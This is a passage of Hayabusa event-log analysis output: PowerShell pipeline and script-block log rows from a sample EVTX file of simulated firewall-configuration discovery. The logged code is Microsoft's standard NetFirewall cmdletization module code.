IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallAddressFilter.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.832 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log," 1.0.0.0 NetFirewallApplicationFilter ",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.832 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 if ($(Microsoft.PowerShell.Core\Get-Command Set-StrictMode -Module Microsoft.PowerShell.Core)) { Microsoft.PowerShell.Core\Set-StrictMode -Off } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetApplicationFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = 'Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter' $script:PrivateData = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.Dictionary[string,string]' Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallApplicationFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Program}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Package}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Program') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Program}) $__cmdletization_queryBuilder.FilterByProperty('AppPath', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Package') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Package}) $__cmdletization_queryBuilder.FilterByProperty('Package', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByApplication', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallApplicationFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallApplicationFilter' function Set-NetFirewallApplicationFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Program}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Package}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Program')) { [object]$__cmdletization_value = ${Program} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AppPath'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AppPath'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Package')) { [object]$__cmdletization_value = ${Package} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallApplicationFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallApplicationFilter'",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.848 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-Command): ""Get-Command"" ParameterBinding(Get-Command): name=""Module""; value=""Microsoft.PowerShell.Core"" ParameterBinding(Get-Command): name=""Name""; value=""Set-StrictMode""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.848 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.848 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Collections.Generic.Dictionary[string,string]""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.848 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.848 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallApplicationFilter""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.848 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallApplicationFilter""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.848 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.848 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Get-NetFirewallApplicationFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Program}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Package}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Program') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Program}) $__cmdletization_queryBuilder.FilterByProperty('AppPath', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Package') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Package}) $__cmdletization_queryBuilder.FilterByProperty('Package', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByApplication', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallApplicationFilter.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.848 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Set-NetFirewallApplicationFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Program}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Package}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Program')) { [object]$__cmdletization_value = ${Program} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AppPath'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AppPath'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Package')) { [object]$__cmdletization_value = ${Package} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallApplicationFilter.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.848 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log," 1.0.0.0 NetFirewallInterfaceFilter ",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.848 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 if ($(Microsoft.PowerShell.Core\Get-Command Set-StrictMode -Module Microsoft.PowerShell.Core)) { Microsoft.PowerShell.Core\Set-StrictMode -Off } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetInterfaceFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = 'Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter' $script:PrivateData = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.Dictionary[string,string]' Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = 